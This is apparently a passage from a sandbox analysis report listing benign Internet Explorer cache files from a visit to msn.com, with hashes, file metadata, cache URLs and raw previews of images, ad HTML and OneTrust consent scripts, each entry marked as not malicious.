                                                                                                                                                                                                                                                            SHA-512:FB74773D977EDB96FD60EDCBF641E2633E9D371E503FA224A80B06500430B34E9B06B5069F9C98B5C506D44C2125D1D4F5092B9ACCF4C52BD8A32C6E5AC69732
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14Ue5t.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                                                                            Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(......(....>........_..."...h.. ....(.....@..%.-.!...@..;..E.QHb...r4PoP...}3I..+".S.j....Uq..\.......eFj.K.....&Dm....W.aZ.V......l..~.hR.X...OS..;...Ll.\pj..26F..b.hM...h..\.:U&.qLC...J..q....`..1T.P+.(.A.....6..5@'....L..h.......9..i......W..S...b..@.@.(...........-rbz..:.]r.....P.@....P.@....P.@....P..:7..,?../..S.v...(.h.i.P.h.3L......(......!.y.p.. .....z.$.....~.8...
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB14hq0P[1].jpg
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):19135
                                                                                                                                                                                                                                                            Entropy (8bit):7.696449301996147
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:IHtFIzAsGkT2tP9ah048vTWjczBRfCghSyOaWLxyAy3FN5GU643lb1y6N0:INFIFTsEG46SjcbmaWLsR3FNY/Ayz
                                                                                                                                                                                                                                                            MD5:01269B6BB16F7D4753894C9DC4E35D8C
                                                                                                                                                                                                                                                            SHA1:B3EBFE430E1BBC0C951F6B7FB5662FEB69F53DEE
                                                                                                                                                                                                                                                            SHA-256:D3E92DB7FBE8DF1B9EA32892AD81853065AD2A68C80C50FB335363A5F24D227D
                                                                                                                                                                                                                                                            SHA-512:0AF92FBC8D3E06C3F82C6BA1DE0652706CA977ED10EEB664AE49DD4ADA3063119D194146F2B6D643F633D48AE7A841A14751F56CC41755B813B9C4A33B82E45C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14hq0P.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                                                                            Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..h.h........(.h........(.h......Z.(........(.h........TNY...W....q@..~..<..h.....dG.@.........F....L.@%}.....-K.F.9...c..O.7X9u,%.k.4..4..c.<p"...cp.-...U.J.n2..9.b.d.SphR.\V.5Q-./.LV.6...HM.V.d^E...F.q.*+7..a.m..VOA..qR.X.rx5&.(..Q..P.R..x..WM-.?........V..GTi.(.(........(........J.(.(......J.(........Z.(........Z.(........Z.(........(.h.......i..H.@...;..Y...q...0.<e+.B...[.v..
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB15AQNm[1].jpg
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):29565
                                                                                                                                                                                                                                                            Entropy (8bit):7.9235998300887145
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:I1cMsjB7+C2bbAEB2SUZRT+kXoMRRJhp5xvHapIzf7m41tgaYi9PIVKnHNVMP2Nm:IHsjkC2YEB2SUPTT48FPHTgf3VKn2Uc
                                                                                                                                                                                                                                                            MD5:6B79D1438D8EFAF3B8DE6163107CEC71
                                                                                                                                                                                                                                                            SHA1:E54E651A8A0FDAFCAD60B137D806D8CEC2F769C0
                                                                                                                                                                                                                                                            SHA-256:2F00C9B0C23EE995091A90ACC7A8FA3AA773612A464F558D78664636C8B7B8D8
                                                                                                                                                                                                                                                            SHA-512:745B822F9E21DB98B909F3AE762C439C376A35AD5C08655861B05539ACD5C47BCDCF24FAB2FB5A56712BC3BEDE6493FD5152E92D065AC5E9ECCE2DF93C4B78B7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB15AQNm.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg&x=868&y=379
                                                                                                                                                                                                                                                            Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...4.m.!....4..i..4..l.C..u .pi....dRe#J..\..t..bC3.)..l.".W.#..&.....-&2.".&.(l..y...r...cE.7..h(#......t..E.....H.^b..../...5 ..r..4&R.>F.. ~..$..R.....1..WDV.L..j.^q..!...T.+..x.$.+._..<{Tc4!.^\$q.ZR`q...Y........A.Ld...(HM.....Z#2b.u40 ...J.F.j.*...Fy.."h..g.&...+H..$2...A....N.c.L...^..c...<Qa..[.. -..v.....-....xg.K.e+..'5[.... !@.ZM.b."....<.........~....(..".~
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB1ftEY0[1].png
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):497
                                                                                                                                                                                                                                                            Entropy (8bit):7.316910976448212
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:6v/7YEtTvpTjO7q/cW7Xt3T4kL+JxK0ew3Jw61:rEtTRTj/XtjNSJMkJw61
                                                                                                                                                                                                                                                            MD5:7FBE5C45678D25895F86E36149E83534
                                                                                                                                                                                                                                                            SHA1:173D85747B8724B1C78ABB8223542C2D741F77A9
                                                                                                                                                                                                                                                            SHA-256:9E32BF7E8805F283D02E5976C2894072AC37687E3C7090552529C9F8EF4DB7C6
                                                                                                                                                                                                                                                            SHA-512:E9DE94C6F18C3E013AB0FF1D3FF318F4111BAF2F4B6645F1E90E5433689B9AE522AE3A899975EAA0AECA14A7D042F6DF1A265BA8BC4B7F73847B585E3C12C262
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1ftEY0.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                                                            Preview: .PNG........IHDR................a....pHYs..........+......IDATx....N.A..=.....bC...RR..`'......v.{:.^..... ."1.2....P..p.....nA......o.....1...N4.9.>..8....g.,...|."...nL.#..vQ.......C.D8.D.0*.DR)....kl..|.......m...T..=.tz...E..y..... ..S.i>O.x.l4p~w......{...U..S....w<.;.A3...R*..F..S1..j..%...1.|.3.mG..... f+.,x....5.e..]lz..*.).1W..Y(..L`.J...xx.y{.*.\. ...L..D..\N........g..W...}w:.......@].j._$.LB.U..w'..S......R..:.^..[\.^@....j...t...?..<.............M..r..h....IEND.B`.
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BBOLLMj[1].png
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):490
                                                                                                                                                                                                                                                            Entropy (8bit):7.249559251541642
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:6v/73D6wUzFUcTwiC0JXFGMcrlauUTKFncvF0298/zuN:mbUZ3U05FG/oP7v8A
                                                                                                                                                                                                                                                            MD5:389EDE7DC948BF40B43FD584D073E09A
                                                                                                                                                                                                                                                            SHA1:38BBD243C4EFE9EC08196B8F6C73EAE7FC0FEB6C
                                                                                                                                                                                                                                                            SHA-256:310B239FF52F2F062FA08557B432137463F76AD581D02AC92F4C028A973AF598
                                                                                                                                                                                                                                                            SHA-512:43FFB57B955D25789B38D2005B7D3BFD3DF0A0AE5D336CAF8B8C299E4874C53993D2226DBBF80E6DB19A34147CEA9052C3DEE6E238C04CAF2F1AA9284C3BCA5C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBOLLMj.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                                                            Preview: .PNG........IHDR................a....pHYs..........+......IDATx.c.v............g.p.:.O..t...D...*.j../_.<.....t...2,..a.wq.0...i5U`.,,,..@...~..WZ.pc.n.IQQ.C0.x..)..{..6N...`n.....p..Y...1....7`..#`..,...ff.......N.Wo.f...'.f....w.=.+...``bb..3.......lt....?..........|..fk..0.{....a.3......NY.....w`...3a.......w....,....1.8t..f.......`...>0....!="....'..........J...'2...1..F.....PBI..a..f5..........X..0..jbM-........>...N<B...n.V.....j.s..YC..;2...j..*<.....UnA.....IEND.B`.
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\auction[1].htm
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):16675
                                                                                                                                                                                                                                                            Entropy (8bit):5.674046813332026
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:CUppSv5t5pyuPZ10apmxvkAWvpzmJ9oApUY3ECrpKPDWs7EL0neH:CVCk3kGvGKcUhPn7E
                                                                                                                                                                                                                                                            MD5:5C566DBC644269408C421E4793B8C9BA
                                                                                                                                                                                                                                                            SHA1:84BED465B4C306FA1F0D530A1B510F8FDBDE026B
                                                                                                                                                                                                                                                            SHA-256:47E742B24CC580109D404A4C6D6A7ED9AFEC6756A36F93A250512382C67B67B8
                                                                                                                                                                                                                                                            SHA-512:8CBEF8B31C4E96CD718E3BE540ADAAF349514501E57533C053EB61E085F7E00A896645D5DB6EC6752A127B7492F19BFD5AD0C565E71360E70B13F76D06F45EE3
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            IE Cache URL:https://srtb.msn.com/auction?a=de-ch&b=5bd8946626c64b85ada8ba182a83d4e1&c=MSN&d=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&e=HP&f=0&g=homepage&h=&j=0&k=0&l=&m=0&n=infopane%7C3%2C11%2C15&o=&p=init&q=&r=&s=1&t=&u=0&v=0&x=&w=&_=1622768627404
                                                                                                                                                                                                                                                            Preview: ..<script id="sam-metadata" type="text/html" data-json="{&quot;optout&quot;:{&quot;msaOptOut&quot;:false,&quot;browserOptOut&quot;:false},&quot;taboola&quot;:{&quot;sessionId&quot;:&quot;v2_9e10b77a8f0ee36d9c30ca1511706578_b02db520-3397-4f20-b699-7a767a66abb6-tuct7b282ea_1622736234_1622736234_CIi3jgYQr4c_GKXgvNXI0rzx4AEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgE&quot;},&quot;tbsessionid&quot;:&quot;v2_9e10b77a8f0ee36d9c30ca1511706578_b02db520-3397-4f20-b699-7a767a66abb6-tuct7b282ea_1622736234_1622736234_CIi3jgYQr4c_GKXgvNXI0rzx4AEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgE&quot;,&quot;pageViewId&quot;:&quot;5bd8946626c64b85ada8ba182a83d4e1&quot;,&quot;RequestLevelBeaconUrls&quot;:[]}">..</script>..<li class="triptych serversidenativead hasimage " data-json="{&quot;tvb&quot;:[],&quot;trb&quot;:[],&quot;tjb&quot;:[],&quot;p&quot;:&quot;taboola&quot;,&quot;e&quot;:true}" data-provider="taboola" data-ad-region="infopane" data-ad-index="3" data-viewability=
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\de-ch[1].json
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):79097
                                                                                                                                                                                                                                                            Entropy (8bit):5.337866393801766
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCgP5HVN/QZYUmftKCB:olLEJxa4CmdiuWlDxHga7B
                                                                                                                                                                                                                                                            MD5:408DDD452219F77E388108945DE7D0FE
                                                                                                                                                                                                                                                            SHA1:C34BAE1E2EBD5867CB735A5C9573E08C4787E8E7
                                                                                                                                                                                                                                                            SHA-256:197C124AD4B7DD42D6628B9BEFD54226CCDCD631ECFAEE6FB857195835F3B385
                                                                                                                                                                                                                                                            SHA-512:17B4CF649A4EAE86A6A38ABA535CAF0AEFB318D06765729053FDE4CD2EFEE7C13097286D0B8595435D0EB62EF09182A9A10CFEE2E71B72B74A6566A2697EAB1B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            IE Cache URL:https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/de-ch.json
                                                                                                                                                                                                                                                            Preview: {"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\http___cdn.taboola.com_libtrc_static_thumbnails_67e22d8aae58f404575f6c0627b07d0b[1].jpg
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):41415
                                                                                                                                                                                                                                                            Entropy (8bit):7.979881870277526
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:IcFlnZamLWu4WDN/FCZUPQAg8y5s5UeFz1McVmB4EEGyy97zQOW2aP:IitNLsk/F2Ulg8yIzCcVmBUW7q2aP
                                                                                                                                                                                                                                                            MD5:17C0F8D8369A745E07F214B945F0DC73
                                                                                                                                                                                                                                                            SHA1:74AEB8E4F611EEC68D207BCA13FBE935FA77B90C
                                                                                                                                                                                                                                                            SHA-256:7A0B1784407CE845F612B166654B6EADD0AD49EBF72FD0298B460A3F2B231F33
                                                                                                                                                                                                                                                            SHA-512:F05ECA9AF436E710085B00C97A4914AB864CDCAD17F80FAD9B23B05C3173929680AB9CB2A055D3FBD2E619C0B447C1E91C30B7E9887003E53BE5FC5DCAD0D5A3
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F67e22d8aae58f404575f6c0627b07d0b.jpg
                                                                                                                                                                                                                                                            Preview: ......JFIF.....................................................................&""&0-0>>T.............................0.#..#.0*3)')3*L;55;LWIEIWj__j............7...............5..................................................................4...H..!a...S.. .V..\v.adM...6.1.s.......{9.........iX..`8.l6..7..!...m .6.D.ec h$j.._8C+...^wo...v.m..m..Gf..H..m.A!}.K...c.h..F...z.s..;....\..h.a.[f..{...s..` .WH..:..[..X1..-......./.ki.#...Mp...6G..V0;...}.....Qt.F...>.. o......w....@......v.7+.V(.B..$..c....WN.J.ufGc.(....'... ..*.)..SF..Ln.{...,.%.:.^.m..L.viV..`.%..A]...l....y..8......a.%.dF..F0.!cJ.........*...z...C.t.<..0\m......&...\..0...{i.Ja...D..y.i^G]y'...~..E.....F.i!.%.bB..:z.h..v....#q..;..T..`C.-.^gN...+v....-.2..%X=.`8.EZb.tX..I...Q>W]x...T....D......).>f..b..Ez..HI.J..v..J...C....s..I.*.v1..VYW...v..y.H.."H..E.Dn...D.3..........aVv!.g..s*....).=rp.@~...]:......S,e....k..n.P.)W.Aj....8nz......+..j#1..k...y'F..%..0sD......k:..G...l...Q*UU.^
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\http___cdn.taboola.com_libtrc_static_thumbnails_858913b40c4df9463261f35e7072478e[1].jpg
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):10817
                                                                                                                                                                                                                                                            Entropy (8bit):7.941573320439761
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:0S3Vdvwi5YUhc0G6BpP2DpaVidXZ11GnbFjy74514So3b15L6yBK:xHYaYsHG6BU/dXZ110tyc5SSmZ5GyM
                                                                                                                                                                                                                                                            MD5:60B85258CD74B2CDE372B6C765E383CF
                                                                                                                                                                                                                                                            SHA1:BFD0EB86AD6F6015AC7C9BCAC4BF230D6EDB5090
                                                                                                                                                                                                                                                            SHA-256:274FA80571B2ECC6500F1BF12B6F65A57D037E0D5BBDED62BBE38547D1453BC2
                                                                                                                                                                                                                                                            SHA-512:F8C0F999879862932F93C485E722B70626DAECD9AD6A8A8E2B4F25031739A9BDD3712035AB2B892363E716BEE977FFAE809A009D4A4419A3DCD9957AE1FC6AFE
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%2Cg_xy_center%2Cx_498%2Cy_293/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F858913b40c4df9463261f35e7072478e.png
                                                                                                                                                                                                                                                            Preview: ......JFIF.....................................................................&""&0-0>>T.......................................................&""&0-0>>T......7...."..........6.....................................................................................................x.....[..n>.......A%h.h,..$..#B}UT.UVI.Q....... .]H.]@.]A.."...\]i.8/7N..7&S.<Y.17.>....{U4....+ .^...:^..FGj........;..VZC.;_.;._.y.E.5..zd.N..y.._l......<..Ns)....5....}c...r}.4~..O..o.<.[.3...r....f.Y..^+.u..4....3..._....~Y.fNK.p.k..[.GM.:ZCD.tWv..i../.p]..o..p..hK.,D.S.O...'......Q....k...........3...,...S.u...{C2.....c....V".[`....q)8.f.......?.'.^0..r.^:.1.o......x|...v..u.M..LVr.H.....Nr...Y...k..].f`.l....E...35.;..j.3..n.;-.X..S.k...5...n.\.f....UW..)..+@..l...8...9x.z."..5=.9.NwG..W/...........+,...?eyhP.) .M..g.|@z.....3.......C.p.~.8.Su...t..i..m()J.R@...J6JY.......}...7`y...a.......q..rx....^.q.(..i......]Z..m4].i.'..<.{s....]C}..~.W.y..O..6.....v.X......T..<\........
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\iab2Data[1].json
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):242382
                                                                                                                                                                                                                                                            Entropy (8bit):5.1486574437549235
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:l3JqIW6A3pZcOkv+prD5bxLkjO68KQHamIT4Ff5+wbUk6syZ7TMwz:l3JqINA3kR4D5bxLk78KsIkfZ6hBz
                                                                                                                                                                                                                                                            MD5:D76FFE379391B1C7EE0773A842843B7E
                                                                                                                                                                                                                                                            SHA1:772ED93B31A368AE8548D22E72DDE24BB6E3855C
                                                                                                                                                                                                                                                            SHA-256:D0EB78606C49FCD41E2032EC6CC6A985041587AAEE3AE15B6D3B693A924F08F2
                                                                                                                                                                                                                                                            SHA-512:23E7888E069D05812710BF56CC76805A4E836B88F7493EC6F669F72A55D5D85AD86AD608650E708FA1861BC78A139616322D34962FD6BE0D64E0BEA0107BF4F4
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            IE Cache URL:https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json
                                                                                                                                                                                                                                                            Preview: {"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\otSDKStub[1].js
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):16853
                                                                                                                                                                                                                                                            Entropy (8bit):5.393243893610489
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:2Qp/7PwSgaXIXbci91iEBadZH8fKR9OcmIQMYOYS7uzdwnBZv7iIHXF2FsT:FRr14FLMdZH8f4wOjawnTvuIHVh
                                                                                                                                                                                                                                                            MD5:82566994A83436F3BDD00843109068A7
                                                                                                                                                                                                                                                            SHA1:6D28B53651DA278FAE9CFBCEE1B93506A4BCD4A4
                                                                                                                                                                                                                                                            SHA-256:450CFBC8F3F760485FBF12B16C2E4E1E9617F5A22354337968DD661D11FFAD1D
                                                                                                                                                                                                                                                            SHA-512:1513DCF79F9CD8318109BDFD8BE1AEA4D2AEB4B9C869DAFF135173CC1C4C552C4C50C494088B0CA04B6FB6C208AA323BFE89E9B9DED57083F0E8954970EF8F22
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            IE Cache URL:https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/otSDKStub.js
                                                                                                                                                                                                                                                            Preview: var OneTrustStub=function(e){"use strict";var t,o,n,i,a,r,s,l,c,p,u,d,m,h,f,g,b,A,C,v,y,I,S,w,T,L,R,B,D,G,E,P,_,U,k,O,F,V,x,N,H,M,j,K=new function(){this.optanonCookieName="OptanonConsent",this.optanonHtmlGroupData=[],this.optanonHostData=[],this.genVendorsData=[],this.IABCookieValue="",this.oneTrustIABCookieName="eupubconsent",this.oneTrustIsIABCrossConsentEnableParam="isIABGlobal",this.isStubReady=!0,this.geolocationCookiesParam="geolocation",this.EUCOUNTRIES=["BE","BG","CZ","DK","DE","EE","IE","GR","ES","FR","IT","CY","LV","LT","LU","HU","MT","NL","AT","PL","PT","RO","SI","SK","FI","SE","GB","HR","LI","NO","IS"],this.stubFileName="otSDKStub",this.DATAFILEATTRIBUTE="data-domain-script",this.bannerScriptName="otBannerSdk.js",this.mobileOnlineURL=[],this.isMigratedURL=!1,this.migratedCCTID="[[OldCCTID]]",this.migratedDomainId="[[NewDomainId]]",this.userLocation={country:"",state:""}};(o=t=t||{})[o.Unknown=0]="Unknown",o[o.BannerCloseButton=1]="BannerCloseButton",o[o.ConfirmChoiceButton
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\otTCF-ie[1].js
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):102879
                                                                                                                                                                                                                                                            Entropy (8bit):5.311489377663803
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:ONkWT0m7r8N1qpPVsjvB6z4Yj3RCjnugKtLEdT8xJORONTMC5GkkJ0XcJGk58:8kunecpuj5QRCjnrKxJg0TMC5ZW8
                                                                                                                                                                                                                                                            MD5:52F29FAC6C1D2B0BAC8FE5D0AA2F7A15
                                                                                                                                                                                                                                                            SHA1:D66C777DA4B6D1FEE86180B2B45A3954AE7E0AED
                                                                                                                                                                                                                                                            SHA-256:E497A9E7A9620236A9A67F77D2CDA1CC9615F508A392ECCA53F63D2C8283DC0E
                                                                                                                                                                                                                                                            SHA-512:DF33C49B063AEFD719B47F9335A4A7CE38FA391B2ADF5ACFD0C3FE891A5D0ADDF1C3295E6FF44EE08E729F96E0D526FFD773DC272E57C3B247696B79EE1168BA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            IE Cache URL:https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
